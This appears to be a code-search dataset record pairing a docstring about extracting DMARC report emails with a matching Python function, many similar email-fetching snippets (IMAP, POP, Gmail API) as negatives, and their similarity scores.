"def get_new_mails(self):\n\t\tif cint(self.settings.use_imap):\n\t\t\tself.imap.select(\"Inbox\")\n\t\t\tif self.settings.no_remaining == '0' and self.settings.uidnext:\n\t\t\t\tif self.settings.uidnext == self.settings.newuidnext:\n\t\t\t\t\treturn False\n\t\t\t\telse:\n\t\t\t\t\t#request all messages between last uidnext and new\n\t\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\tresponse, message = self.imap.uid('search', None, \"ALL\")\n\t\t\temail_list = message[0].split()\n\t\telse:\n\t\t\temail_list = self.pop.list()[1]\n\n\t\treturn email_list",
"def filter_unread(check_what, criteria, return_what):\n imap = imaplib.IMAP4_SSL(config[\"email\"][\"server\"])\n imap.login(config[\"email\"][\"user\"], config[\"email\"][\"pass\"])\n status, messages = imap.select(\"INBOX\")\n \n status, response = imap.search(None, '(UNSEEN)')\n unread_msg_nums = response[0].split()\n\n ret = [] \n for i in unread_msg_nums:\n parse_return = parse(imap, i, check_what, criteria, return_what)\n if parse_return is not None:\n ret.append(parse_return)\n set_unseen(imap, i)\n imap.close()\n imap.logout()\n\n return ret",
"def get_messages(self, mailbox):\n\n type = None # Return value\n data = None # Search data\n\n self.items = []\n\n try:\n self.connect(mailbox)\n except Exception as e:\n print(\"Exception: %s\" % e)\n return\n\n type, data = self.connection.uid(\"SEARCH\", None, \"(UNDELETED)\")\n\n if type == \"OK\":\n\n for uid in data[0].split():\n uid = uid.decode(\"ISO-8859-1\")\n msg = self.get_message(uid)\n\n if msg:\n url = self.get_url(msg.decode(\"ISO-8859-1\"))\n\n if url:\n self.items.append(Rss_Item(uid, url))\n else:\n print(\"Could not find URL in message %s\" % uid)\n\n else:\n print(\"Could not parse message %s\" % uid)\n\n\n self.disconnect()\n\n if self.limit:\n del self.items[self.limit:]",
"def main():\n \n ####GET ALL MESSAGES FROM GMAIL###\n # gmail_usr_name = raw_input(\"Enter the gmail user name: \\n\")\n # gmail_passwrd = getpass.getpass(\"Enter the Gmail password: \\n\")\n print(\"Please wait while message IDs for Gmail are populated...\")\n gmail_accumulator = Accumulator.Accumulator(GMAIL_PATH, \"usr_name\", \"passwrd\",\n IMAP_PORT, GMAIL_FOLDER)\n gmail_msg_ids = gmail_accumulator.get_ids()\n pprint.pprint(gmail_msg_ids)\n \n ####GET ALL MESSAGES FROM IMAP###\n #IMAP2_usr_name = raw_input(\"Enter the IMAP2 user name: \\n\")\n #IMAP2_passwrd = getpass.getpass(\"Enter the IMAP2 password: \\n\")\n print(\"Please wait while message IDs for IMAP are populated\")\n \n IMAP2_accumulator = Accumulator.Accumulator(\"imap2.lbl.gov\", \"usr_name\", \"passwrd\",\n IMAP_PORT, IMAP2_FOLDER)\n IMAP2_msg_ids = IMAP2_accumulator.get_ids()\n pprint.pprint(IMAP2_msg_ids)\n \n gmail_unique_ids = gmail_accumulator.get_unique_ids()\n ###FIND THE DIFFERENCES BETWEEN IMAP AND GMAIL.####\n compare_ids = Comparator.Comparator(IMAP2_msg_ids, gmail_unique_ids)\n diff_ids = compare_ids.compare()\n \n ###FIND THE DUPLICATE IDs FROM IMAP2.###\n \n dups = IMAP2_accumulator.get_duplicate_ids()\n dup_headers = header_info(dups, IMAP2_accumulator)\n print(\"{num_msgs} messages in IMAP2/{fldr}\\n\".format(num_msgs = IMAP2_accumulator.count_ids(), fldr = IMAP2_accumulator.folder))\n print(\"{num_msgs} messages in GMAIL/{fldr}\\n\".format(num_msgs = gmail_accumulator.count_ids(), fldr = gmail_accumulator.folder))\n \n print(\"-------------------------------------------------------------------------------------\")\n print(\"There are {num} messages in IMAP2/{fldr1} which are not in Gmail/{fldr2}\\n\".format(num = len(diff_ids),\n fldr1 = IMAP2_accumulator.folder,\n fldr2 = gmail_accumulator.folder))\n print(\"--------------------------------------------------------------------------------------\")\n pprint.pprint(diff_ids)\n\n print(\"Here is a list of the headers of each message ID which is not in Gmail:\\n\")\n headers = header_info(diff_ids, IMAP2_accumulator)\n\n ###print a table of the info of the missing messages.###\n table = prettytable.PrettyTable([\"TO\", \"FROM\", \"SUBJECT\"])\n table.align[\"TO\"] = \"l\"\n table.padding_width = 1\n for hdr in headers:\n table.add_row(hdr)\n print(table)\n\n\n ###write the output to OUTPUT_FILE.###\n\n output_file = open(OUTPUT_FILE, 'w')\n output_file.write(\"\\n\")\n output_file.write(\"{num_msgs} messages in IMAP2/{fldr}\\n\".format(num_msgs = IMAP2_accumulator.count_ids(), fldr = IMAP2_accumulator.folder))\n output_file.write(\"{num_msgs} messages in GMAIL/{fldr}\\n\".format(num_msgs = gmail_accumulator.count_ids(), fldr = gmail_accumulator.folder))\n output_file.write(\"There are {num} messages in IMAP2/{fldr1} which are not in Gmail/{fldr2} \\n\".format(num = len(diff_ids),\n fldr1 = IMAP2_accumulator.folder,\n fldr2 = gmail_accumulator.folder))\n output_file.write(\"Here is a list of the headers of each message ID which is not in Gmail:\\n\")\n for ids in diff_ids:\n output_file.write(str(ids))\n output_file.write(\"\\n\")\n output_file.write(\"\\n\")\n\n ###OUUTPUT THE TABLE###\n\n output_file.write(str(table)) \n output_file.write(LINE_SEPARATOR)\n\n output_file.close()\n\n ucb.interact()",
"def main():\r\n credentials = get_credentials()\r\n http = credentials.authorize(httplib2.Http())\r\n service = discovery.build('gmail', 'v1', http=http)\r\n\r\n response = service.users().messages().list(userId=USER_ID, labelIds=[\"SPAM\"]).execute()\r\n messages = []\r\n if 'messages' in response:\r\n messages.extend(response['messages'])\r\n\r\n while 'nextPageToken' in response:\r\n page_token = response['nextPageToken']\r\n response = service.users().messages().list(userId=USER_ID, labelIds=[\"SPAM\"], pageToken=page_token).execute()\r\n messages.extend(response['messages'])\r\n\r\n i = 0\r\n for message in messages:\r\n msg_id = message[\"id\"]\r\n message = service.users().messages().get(userId=USER_ID, id=msg_id).execute()\r\n for prop in message[\"payload\"][\"headers\"]:\r\n if prop[\"name\"] == \"From\":\r\n print(\"ID:\", i, \"\\tFrom:\", prop[\"value\"].encode('ascii','replace'), end=\"\\t\")\r\n elif prop[\"name\"] == \"Subject\":\r\n print(\"Subject:\", prop[\"value\"].encode('ascii','replace'))\r\n i += 1\r\n\r\n to_keep = raw_input(\"Do you want to keep any emails? [N / 0,1,...] \")\r\n if \",\" in to_keep:\r\n to_keep = to_keep.split(\",\")\r\n for i in range(len(to_keep)):\r\n to_keep[i] = int(to_keep[i])\r\n elif to_keep != \"N\":\r\n to_keep = [int(to_keep)]\r\n\r\n if isinstance(to_keep, list):\r\n for i in range(len(to_keep)-1,-1,-1):\r\n msg_labels = {'removeLabelIds': [\"SPAM\"], 'addLabelIds': [\"INBOX\"]}\r\n msg_id = messages[to_keep[i]][\"id\"]\r\n message = service.users().messages().modify(userId=USER_ID, id=msg_id, body=msg_labels).execute()\r\n del messages[to_keep[i]]\r\n\r\n # ANe1BmiDP-rAoJSwkw8T119UU0Z7oisOlVJ4xQ\r\n # filter0 = service.users().settings().filters().get(userId=USER_ID, id=\"ANe1BmiDP-rAoJSwkw8T119UU0Z7oisOlVJ4xQ\").execute()\r\n # print(filter0)\r\n\r\n for message in messages:\r\n msg_id = message[\"id\"]\r\n # for prop in message[\"payload\"][\"headers\"]:\r\n # if prop[\"name\"] == \"From\":\r\n # start_email = prop[\"value\"].find(\"<\")\r\n # end_email = prop[\"value\"].find(\">\", start_email + 1)\r\n # email_address = prop[\"value\"][start_email + 1:end_email]\r\n # filter0[\"criteria\"][\"from\"] = filter0[\"criteria\"][\"from\"] + \" OR \" + email_address\r\n service.users().messages().delete(userId=USER_ID, id=msg_id).execute()\r\n\r\n # service.users().settings().filters().delete(userId=USER_ID, id=\"ANe1BmiDP-rAoJSwkw8T119UU0Z7oisOlVJ4xQ\").execute()\r\n # service.users().settings().filters().create(userId=USER_ID, body=filter0).execute()\r\n print(\"All Spam Deleted!\")",
"def fetch_all(self):\n emails = []\n res, messages = self._mailconn.search(None, 'ALL')\n if res == 'OK':\n for msg in messages[0].split():\n try:\n res, data = self._mailconn.fetch(msg.decode('utf-8'), '(RFC822)')\n except Exception as error:\n self.close_mail_connection()\n print('No email to read: '+error)\n exit()\n \n msg = email.message_from_string((data[0][1]).decode('utf-8'))\n if not isinstance(msg, str):\n if self.is_sender_in_whitelist(msg['From']):\n emails.append(msg)\n\n return emails",
"def downloadMessages(iinmap4, uids, process_message):\n\ttotal_amount = str(len(uids))\n\tfor i in uids:\n\t\tprint('Fetching message No.' + str(i)+'/' + total_amount + '...')\n\t\tmail = M.fetch(str(i),'(RFC822)')[1][0][1]\n\t\tprocess_message(mail)",
"def load_received_messages(username):\n return [m for m in load_all_messages() if m[\"to\"] == username]",
"def get_all_msgs(self):\n data = self.database.select(self.tname)\n msgs = []\n for item in data:\n msgs.append((item[0], self.data_to_msg(item)))\n return msgs",
"def get_mail_list(self) -> List[int]:\n response = self.IMAP.select(self.mailconfig.folderInbox)\n if response[0] != \"OK\":\n log.error(\"Error accessing Folder '%s': %s\" % (self.mailconfig.folderInbox, response[1][0].decode()))\n emailcount: int = int(response[1][0])\n if not emailcount > 0:\n return []\n log.info(\"%s email(s) in inbox\" % emailcount)\n\n response = self.IMAP.uid(\"search\", None, \"(ALL)\")\n if response[0] != \"OK\":\n log.error(\"Failed to retrieve mails from inbox: %s\" % response[1][0].decode())\n return []\n # TODO: Raise exception?\n indices: List[bytes] = response[1][0].split()\n return [int(x) for x in indices]",
"def get_message_list(self):\n count = 0\n for msg in self.mbox:\n if msg['From'].find(self.config['tgt_email']) > -1:\n dtime = arrow.get(msg['Date'], 'ddd, D MMM YYYY HH:mm:ss ZZ')\n message = dict({'from': msg['From'],\n 'date': dtime,\n 'subject': msg['Subject']})\n # boundary = msg.get_boundary()\n # if boundary is not None:\n # bounds = [m.start() for m\n # in re.finditer(boundary, str(msg))]\n # else:\n # bounds = list()\n # if len(bounds) > 2:\n # message['text'] = str(msg)[bounds[1]:bounds[2]]\n # else:\n # message['text'] = None\n pl = None\n if msg['Subject'].find(\":\") == -1:\n finished = False\n pl = msg.get_payload()\n while finished is False:\n if isinstance(pl, str):\n finished = True\n elif isinstance(pl, list):\n pl = pl[0].get_payload()\n else:\n raise ValueError(\"Non-list, non-str payload?\")\n break\n message['text'] = self.clean_text(str(pl))\n\n if message['text'] is not None:\n self.messages.append(message)\n count += 1\n # print count\n self.messages.sort(key=lambda item: item['date'])",
"def fetch(self, messages, uid):\n return list(zip(range(1, len(self.msgObjs) + 1), self.msgObjs))",
"def get_group_of_emails(M):\n print \"Try to access group of emails\"\n data = search_email_advanced(M)\n if data is None:\n return\n # print \"Got data as \", data\n ids = data[0]\n id_list = ids.split()\n for id_num in id_list:\n rv, data = M.uid('fetch', id_num, \"(RFC822)\")\n if rv != \"OK\":\n print \"Error getting message\"\n return\n # get raw text of the whole email\n raw_email = data[0][1]\n content = email.message_from_string(raw_email)\n # print raw_email\n p = EmailParser()\n # print sender and receivers\n print \"To: \", content['To'], \"\\n\"\n print \"From: \", email.utils.parseaddr(content['From']), \"\\n\"\n print \"Date: \", content['Date'], \"\\n\"\n print \"Subject: \", p.parsestr(raw_email).get('Subject'), \\\n \"\\n\"\n result = parse_content(content)\n # print results\n printData(result)",
"def get_unread_email_ids(gmail_client):\n response = gmail_client.users().messages().list(userId='me',q='is:unread').execute()\n\n if 'messages' in response: # messages key only exists if there are unread messages\n return [message['id'] for message in response['messages']]\n else:\n print(\"No unread messages...\")\n return [] # still return a list since that's what caller expects",
"def get_messages(self):\n\t\tif not self.check_mails():\n\t\t\treturn # nothing to do\n\n\t\tfrappe.db.commit()\n\n\t\ttry:\n\t\t\t# track if errors arised\n\t\t\tself.errors = False\n\t\t\tself.latest_messages = []\n\t\t\tif cint(self.settings.use_imap):\n\t\t\t\tuid_validity = self.get_status()\n\t\t\telse:\n\t\t\t\temail_list = self.get_new_mails()\n\n\n\t\t\t# size limits\n\t\t\tself.total_size = 0\n\t\t\tself.max_email_size = cint(frappe.local.conf.get(\"max_email_size\"))\n\t\t\tself.max_total_size = 5 * self.max_email_size\n\t\t\tif cint(self.settings.use_imap):\n\t\t\t\t#try:\n\t\t\t\tif self.check_uid_validity(uid_validity):\n\t\t\t\t\temail_list = self.get_new_mails()\n\t\t\t\t\tif email_list:\n\t\t\t\t\t\tself.get_imap_messages(email_list)\n\t\t\t\t\tself.sync_flags()\n\t\t\t\t\tself.get_seen()\n\t\t\t\t\tself.push_deleted()\n\n\t\t\t\telse:\n\t\t\t\t\tpass\n\n\t\t\telse:\n\t\t\t\tnum = num_copy = len(email_list)\n\n\t\t\t\t# WARNING: Hard coded max no. of messages to be popped\n\t\t\t\tif num > 20: num = 20 #20\n\n\t\t\t\tfor i, message_meta in enumerate(email_list):\n\t\t\t\t\t# do not pull more than NUM emails\n\t\t\t\t\tif (i+1) > num:\n\t\t\t\t\t\tbreak\n\n\t\t\t\t\ttry:\n\t\t\t\t\t\tself.retrieve_message(message_meta, i+1)\n\t\t\t\t\texcept (TotalSizeExceededError, EmailTimeoutError, LoginLimitExceeded):\n\t\t\t\t\t\tbreak\n\n\t\t\t\t# WARNING: Mark as read - message number 101 onwards from the pop list\n\t\t\t\t# This is to avoid having too many messages entering the system\n\t\t\t\tnum = num_copy\n\t\t\t\tif not cint(self.settings.use_imap):\n\t\t\t\t\tif num > 100 and not self.errors:\n\t\t\t\t\t\tfor m in xrange(101, num+1):\n\t\t\t\t\t\t\tself.pop.dele(m)\n\n\t\texcept Exception, e:\n\t\t\tif self.has_login_limit_exceeded(e):\n\t\t\t\tpass\n\n\t\t\telse:\n\t\t\t\traise\n\n\t\tfinally:\n\t\t\t# no matter the exception, pop should quit if connected\n\t\t\tif cint(self.settings.use_imap):\n\t\t\t\tself.imap.logout()\n\t\t\telse:\n\t\t\t\tself.pop.quit()\n\n\t\treturn self.latest_messages",
"def fetch(self, start, stop=None, mbox=None):\n self.select_mailbox(mbox, False)\n if start and stop:\n submessages = self.messages[start - 1:stop]\n mrange = \",\".join(submessages)\n else:\n submessages = [start]\n mrange = start\n headers = \"DATE FROM TO CC SUBJECT\"\n query = (\n \"(FLAGS BODYSTRUCTURE RFC822.SIZE BODY.PEEK[HEADER.FIELDS ({})])\"\n .format(headers)\n )\n data = self._cmd(\"FETCH\", mrange, query)\n result = []\n for uid in submessages:\n msg_data = data[int(uid)]\n msg = email.message_from_string(\n msg_data[\"BODY[HEADER.FIELDS ({})]\".format(headers)]\n )\n msg[\"imapid\"] = uid\n msg[\"size\"] = msg_data[\"RFC822.SIZE\"]\n if r\"\\Seen\" not in msg_data[\"FLAGS\"]:\n msg[\"style\"] = \"unseen\"\n if r\"\\Answered\" in msg_data[\"FLAGS\"]:\n msg[\"answered\"] = True\n if r\"$Forwarded\" in msg_data[\"FLAGS\"]:\n msg[\"forwarded\"] = True\n if r\"\\Flagged\" in msg_data[\"FLAGS\"]:\n msg[\"flagged\"] = True\n bstruct = BodyStructure(msg_data[\"BODYSTRUCTURE\"])\n if bstruct.has_attachments():\n msg[\"attachments\"] = True\n result += [msg]\n return result",
"def list_messages(self):"
] |
[
"0.6295551",
"0.62364864",
"0.62362725",
"0.60055697",
"0.594121",
"0.5897799",
"0.58424914",
"0.5746784",
"0.5717757",
"0.56050134",
"0.55439585",
"0.5524731",
"0.5513999",
"0.54761916",
"0.5467063",
"0.54425406",
"0.54308563",
"0.54162484",
"0.5410898",
"0.5395196",
"0.53838587",
"0.5382463",
"0.538147",
"0.5381258",
"0.53809685",
"0.53723586",
"0.53377116",
"0.5322359",
"0.53056794",
"0.5286006"
] |
0.64419127
|
0
|
Return the full message bodies from the list of message uids but only if the subject matches Report domain
|
def get_dmarc_message_bodies(self, messages):
response = {}
for uid in messages:
self.helper.log_debug('get_dmarc_message_bodies: got uid "%s", using uid "%s"' % (uid, uid.split()[0]))
msg = "\n".join(self.byte2str(self.server.retr(uid.split()[0])[1]))
msgobj = email.message_from_string(msg)
if "report domain:" in msgobj.get("Subject").lower():
self.helper.log_debug(
'get_dmarc_message_bodies: found dmarc message: uid %s with subject %s' %
(uid, msgobj.get("Subject")))
response[uid] = {}
response[uid][b'RFC822'] = msg
return response
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def save_reports_from_message_bodies(self, response):\n filelist = []\n for uid, data in list(response.items()):\n if self.opt_validate_dkim:\n self.dkim_verify(data.get(b'RFC822',''), uid)\n msg = email.message_from_string(data.get(b'RFC822',''))\n if msg.is_multipart():\n self.helper.log_debug(\n 'save_reports_from_message_bodies: start multipart processing of msg uid %s' %\n uid)\n for part in msg.get_payload():\n ctype = part.get_content_type()\n if self.check_eligible_mimetype(ctype, uid):\n filename = self.write_part_to_file(uid, part)\n filelist.append(filename)\n else:\n self.helper.log_debug(\n 'save_reports_from_message_bodies: start non-multipart processing of msg uid %s' %\n uid)\n ctype = msg.get_content_type()\n if self.check_eligible_mimetype(ctype, uid):\n filename = self.write_part_to_file(uid, msg)\n filelist.append(filename)\n else:\n self.helper.log_debug(\n 'save_reports_from_message_bodies: skipping content-type %s of msg uid %s' %\n (ctype, uid))\n # mark msg as seen in KVstore\n self.save_check_point(uid.split()[1], msg)\n return filelist",
"def recipients(self) -> ty.List[str]:",
"def email_sent_with_subject(subject):\n return [email.subject == subject for email in mail.outbox]",
"def get_message_list(self):\n count = 0\n for msg in self.mbox:\n if msg['From'].find(self.config['tgt_email']) > -1:\n dtime = arrow.get(msg['Date'], 'ddd, D MMM YYYY HH:mm:ss ZZ')\n message = dict({'from': msg['From'],\n 'date': dtime,\n 'subject': msg['Subject']})\n # boundary = msg.get_boundary()\n # if boundary is not None:\n # bounds = [m.start() for m\n # in re.finditer(boundary, str(msg))]\n # else:\n # bounds = list()\n # if len(bounds) > 2:\n # message['text'] = str(msg)[bounds[1]:bounds[2]]\n # else:\n # message['text'] = None\n pl = None\n if msg['Subject'].find(\":\") == -1:\n finished = False\n pl = msg.get_payload()\n while finished is False:\n if isinstance(pl, str):\n finished = True\n elif isinstance(pl, list):\n pl = pl[0].get_payload()\n else:\n raise ValueError(\"Non-list, non-str payload?\")\n break\n message['text'] = self.clean_text(str(pl))\n\n if message['text'] is not None:\n self.messages.append(message)\n count += 1\n # print count\n self.messages.sort(key=lambda item: item['date'])",
"def fetchmail(self):\n mails = []\n\n if self.security == 'SSL/TLS':\n imap = IMAP4_SSL(self.host, self.port)\n else:\n imap = IMAP4(self.host, self.port)\n if self.security == 'STARTTLS':\n imap.starttls()\n imap.login(self.username, self.passwd)\n imap.select(readonly=True)\n\n status, uids = imap.uid('SEARCH', 'UNSEEN')\n\n for uid in uids[0].split():\n status, data = imap.uid('FETCH', uid, '(BODY[HEADER.FIELDS (DATE SUBJECT FROM)])')\n message = self._message_from_data(data)\n mail = Mail(uid, message['FROM'], message['SUBJECT'], message['DATE'])\n mails.append(mail)\n\n imap.close()\n imap.logout()\n\n return mails",
"def filtered_messages(self, msg_type_set):\n ids = {msg_type.get_message_id() for msg_type in msg_type_set}\n\n while True:\n data = self._read_binary_sirf_msg()\n if sirf.bytes_to_message_id(data) in ids:\n yield sirf.from_bytes(data)",
"def _payload_messages(payloads):\n return [\n message for payload in payloads\n for message in payload.sqs_messages\n ]",
"def get_recipients(self, cr, uid, ids, model=None, context=None):\n Statistics = self.pool['mail.mail.statistics']\n res = dict.fromkeys(ids, False)\n for cid in ids:\n domain = [('mass_mailing_campaign_id', '=', cid)]\n if model:\n domain += [('model', '=', model)]\n stat_ids = Statistics.search(cr, uid, domain, context=context)\n res[cid] = set(stat.res_id for stat in Statistics.browse(cr, uid, stat_ids, context=context))\n return res",
"def load_sent_messages(username):\n return [m for m in load_all_messages() if m[\"from\"] == username]",
"def process_mailbox(M):\n rv, data = M.search(None, \"ALL\")\n if rv != 'OK':\n print \"No messages found!\"\n return\n\n ids = data[0]\n id_list = ids.split()\n for num in id_list:\n rv, data = M.fetch(num, '(RFC822)')\n if rv != 'OK':\n print \"ERROR getting message\", num\n return\n\n msg = email.message_from_string(data[0][1])\n decode = email.header.decode_header(msg['Subject'])[0]\n subject = unicode(decode[0])\n print 'Message %s: %s' % (num, subject)\n print 'Raw Date:', msg['Date']\n # Now convert to local date-time\n date_tuple = email.utils.parsedate_tz(msg['Date'])\n if date_tuple:\n local_date = datetime.datetime.fromtimestamp(\n email.utils.mktime_tz(date_tuple))\n print \"Local Date:\", \\\n local_date.strftime(\"%a, %d %b %Y %H:%M:%S\")",
"def fetch(self, start, stop=None, mbox=None):\n self.select_mailbox(mbox, False)\n if start and stop:\n submessages = self.messages[start - 1:stop]\n mrange = \",\".join(submessages)\n else:\n submessages = [start]\n mrange = start\n headers = \"DATE FROM TO CC SUBJECT\"\n query = (\n \"(FLAGS BODYSTRUCTURE RFC822.SIZE BODY.PEEK[HEADER.FIELDS ({})])\"\n .format(headers)\n )\n data = self._cmd(\"FETCH\", mrange, query)\n result = []\n for uid in submessages:\n msg_data = data[int(uid)]\n msg = email.message_from_string(\n msg_data[\"BODY[HEADER.FIELDS ({})]\".format(headers)]\n )\n msg[\"imapid\"] = uid\n msg[\"size\"] = msg_data[\"RFC822.SIZE\"]\n if r\"\\Seen\" not in msg_data[\"FLAGS\"]:\n msg[\"style\"] = \"unseen\"\n if r\"\\Answered\" in msg_data[\"FLAGS\"]:\n msg[\"answered\"] = True\n if r\"$Forwarded\" in msg_data[\"FLAGS\"]:\n msg[\"forwarded\"] = True\n if r\"\\Flagged\" in msg_data[\"FLAGS\"]:\n msg[\"flagged\"] = True\n bstruct = BodyStructure(msg_data[\"BODYSTRUCTURE\"])\n if bstruct.has_attachments():\n msg[\"attachments\"] = True\n result += [msg]\n return result",
"def check_answer(self,msg_list,honeypotids,expect_dict):\n filtered_msgs = []\n for msg in msg_list:\n if \"ALL\" in honeypotids or msg[\"from\"] in honeypotids:\n for k in expect_dict.keys():\n if k in msg.keys():\n if msg[k] == expect_dict[k]:\n filtered_msgs.append(msg)\n return filtered_msgs",
"def get_user_messages(user_id):\n pass \n # user_message_list = []\n\n # for message in sent messages:",
"def recipients_for_conflict(self, conflict):\n recipients = self.default_recipients\n recipients.add(conflict.revision.author)\n filtered_recipients = set([x for x in [y.strip() for y in recipients if y] if x])\n return set([add_email_domain(x, self.domain) for x in filtered_recipients])",
"def fetch_all(self):\n emails = []\n res, messages = self._mailconn.search(None, 'ALL')\n if res == 'OK':\n for msg in messages[0].split():\n try:\n res, data = self._mailconn.fetch(msg.decode('utf-8'), '(RFC822)')\n except Exception as error:\n self.close_mail_connection()\n print('No email to read: '+error)\n exit()\n \n msg = email.message_from_string((data[0][1]).decode('utf-8'))\n if not isinstance(msg, str):\n if self.is_sender_in_whitelist(msg['From']):\n emails.append(msg)\n\n return emails",
"def downloadMessages(iinmap4, uids, process_message):\n\ttotal_amount = str(len(uids))\n\tfor i in uids:\n\t\tprint('Fetching message No.' + str(i)+'/' + total_amount + '...')\n\t\tmail = M.fetch(str(i),'(RFC822)')[1][0][1]\n\t\tprocess_message(mail)",
"def get_raw_list_mailboxes(self, directory: str= '\"\"') -> Union[List[bytes], None]:\n self._authenticated_or_die()\n # noinspection PyUnusedLocal\n status: str\n status, mailboxes = self._imap.list(directory)\n if 'OK' != status:\n return None\n return mailboxes",
"def get_remediation_targets(message_ids):\n\n from saq.email import get_email_archive_sections, search_archive\n\n if not message_ids:\n return []\n\n result = [] # of ( message-id, recipient )\n\n logging.info(\"searching for remediation targets for {} message-ids\".format(len(message_ids)))\n\n # first search email archives for all delivered emails that had this message-id\n for source in get_email_archive_sections():\n search_result = search_archive(source, message_ids, excluded_emails=saq.CONFIG['remediation']['excluded_emails'].split(','))\n for archive_id in search_result:\n result.append((search_result[archive_id].message_id, search_result[archive_id].recipient))\n #message_id = search_result[archive_id].message_id\n #recipient = search_result[archive_id].recipient\n #sender = result[archive_id].sender\n #subject = result[archive_id].subject\n #if message_id not in targets:\n #targets[message_id] = { \"recipients\": {}, \"sender\": sender, \"subject\": subject }\n #targets[message_id][\"recipients\"][recipient] = { \"removed\": 0, \"history\": [] }\n\n #with get_db_connection() as db:\n #c = db.cursor()\n\n # get remediation history of each target\n #c.execute(\"\"\"SELECT remediation.key, action, insert_date, username, result, successful, removed\n #FROM email_remediation\n #JOIN remediation ON email_remediation.key = remediation.key\n #JOIN users ON remediation.user_id = users.id\n #WHERE message_id IN ( {} )\n #ORDER BY insert_date ASC\"\"\".format(','.join(['%s' for _ in message_ids])), tuple(message_ids))\n #for row in c:\n #key, action, insert_date, user, result, successful, removed = row\n #message_id, recipient = key.split(':')\n #if recipient not in targets[message_id]['recipients']:\n ###targets[message_id]['recipients'][recipient] = { \"removed\": 0, \"history\": [] }\n #targets[message_id]['recipients'][recipient][\"removed\"] = removed targets[message_id]['recipients'][recipient][\"history\"].append({\"action\":action, \"insert_date\":insert_date, \"user\":user, \"result\":result, \"successful\":successful})\n#\n logging.info(\"found {} remediation targets for {} message-ids\".format(len(result), len(message_ids)))\n return result",
"def createWordList(emailids, emaildata): #creates word list of all the words used in email bodies\n with open('res/dictionary.txt', 'w') as f:\n words = set([])\n for emailid in emailids:\n email = e.Email(emailid)\n subject = set(email.parsedsubject)\n body = set(email.body)\n try:\n emailcontent = body.union(subject)\n for word in emailcontent:\n if not word in words:\n words.add(word)\n f.write(word + '\\n')\n except AttributeError:\n print(body)",
"def get_recipients(item_container):\n if item_container.item.string_1 != '':\n user_folder = get_item_container_by_path(item_container.item.string_1)\n return get_all_users_with_email(user_folder)\n else:\n while not check_userfolder(item_container):\n item_container = item_container.get_parent()\n return get_all_users_with_email(item_container)",
"def get_raw_emails_ids(self, *criteria, mailbox=None) -> Union[List[bytes], None]:\n self._authenticated_or_die()\n if mailbox is not None:\n self.select_mailbox(mailbox)\n if self._selected_mailbox is None:\n raise Exception('In order to get the list of emails in a mailbox, you must select a mailbox first!')\n criteria = ['ALL'] if 0 == len(criteria) else criteria\n # noinspection PyUnusedLocal\n status: str\n status, ids = self._imap.search(None, *criteria)\n if 'OK' != status:\n return None\n return ids",
"def check_for_subscribers(mail, login_info):\n ADDRESS, PASSWORD = login_info\n\n try:\n mail.select('inbox')\n data = mail.search(None, 'ALL') \n except:\n mail = imaplib.IMAP4_SSL('imap.gmail.com')\n mail.login(ADDRESS, PASSWORD)\n mail.select('inbox')\n data = mail.search(None, 'ALL')\n \n mail_ids = data[1]\n id_list = mail_ids[0].split() \n\n if not id_list:\n return []\n\n first_email_id = int(id_list[0])\n latest_email_id = int(id_list[-1])\n\n subscribers = []\n\n for i in range(latest_email_id, first_email_id-1, -1):\n data = mail.fetch(str(i), '(RFC822)')\n for response_part in data:\n arr = response_part[0]\n if isinstance(arr, tuple):\n msg = email.message_from_string(str(arr[1],'utf-8'))\n email_from = msg['from']\n subscribers.append(email_from)\n\n return subscribers",
"def get_recipients(msg_parsed):\n recipients = []\n addr_fields = ['From', 'To', 'Cc', 'Bcc']\n\n for f in addr_fields:\n rfield = msg_parsed.get(f, \"\") # Empty string if field not present\n rlist = re.findall(ADDR_PATTERN, rfield)\n recipients.extend(rlist)\n\n return recipients",
"def get_body_infos():\n return [get_body_info(i) for i in get_body_ids()]",
"def load_received_messages(username):\n return [m for m in load_all_messages() if m[\"to\"] == username]",
"async def test_subjects_to_ignore_by_uuid(self):\n first_subject_uuid = first(first(self.reports[\"reports\"])[\"subjects\"].keys())\n self.set_source_parameter(\"subjects_to_ignore\", [first_subject_uuid])\n response = await self.collect(get_request_json_side_effect=[self.data_model, self.reports])\n self.assert_measurement(response, value=str(int(len(self.entities) / 2)), total=self.expected_software_metrics)",
"def send(self):\n msg_sent = []\n subs = mongo.db.subscribers\n bill_extractor = ExtractBills()\n \n # Do not need the object ID\n same_interval = subs.find({\"interval\":self.interval}, {'_id':0})\n \n for each in same_interval:\n email = each['email']\n tags = each['search_tags']\n state = each['state']\n chamber = each['chamber']\n print(email, tags)\n\n msg_for_rcpnt = bill_extractor.getBill(state, chamber, tags)\n #all_candidates.append((email, msg_for_rcpnt))\n \n #try:\n # msg_body = \"hello world\"\n # msg_body = render_template('mail_card.html')\n # msg = Message(msg_body,\n # sender=\"[email protected]\",\n # recipients=email)\n # mail.send(msg) \n # msg_sent.append((email, \"Success\"))\n #except Exception as e:\n # msg_sent.append((email, str(e)))\n #return msg_sent\n return msg_for_rcpnt",
"def getMessagesMatchingQuery(self, search_query_dict: Dict[str, str]) -> List[Dict[str, str]]:\n\n valid_operators = [\n 'from',\n 'to',\n 'subject',\n 'label',\n 'after',\n 'before',\n 'phrase',\n ]\n\n search_query = ''\n for operator in search_query_dict:\n if operator in valid_operators:\n search_query += '{query_type}:{query}'.format(\n query_type=operator, \n query=search_query_dict[operator]\n )\n search_query += ' '\n \n results = self.service.users().messages().list(userId='me', q=search_query).execute()\n messages_ids = results.get('messages', [])\n error = 'No messages found.'\n if not messages_ids:\n print(error)\n # return [error]\n \n return messages_ids",
"def filter_subjects(self):\n return self.filter_nodes('//Subjects/Subject')",
"def query_by_ids(self, ids=None, **kwargs):\n # kwargs['ids'] = ids.replace(' ', '')\n templates = []\n for k in ids:\n path = '/do/read/id/'+str(k)\n result = self._get(path=path, params=kwargs)\n template = result.get('emailTemplate')\n templates.append(template)\n return templates"
] |
[
"0.5849805",
"0.56086826",
"0.5588328",
"0.5531413",
"0.545257",
"0.5355394",
"0.53144324",
"0.52374667",
"0.519424",
"0.51788527",
"0.51319355",
"0.5126954",
"0.5124737",
"0.509778",
"0.50920707",
"0.50811964",
"0.50755876",
"0.50523406",
"0.50435853",
"0.50309765",
"0.5027881",
"0.50236756",
"0.5017437",
"0.501133",
"0.5008998",
"0.5006475",
"0.49655384",
"0.49482223",
"0.491787",
"0.48974323"
] |
0.6986212
|
0
|
Write the selected message part to file
|
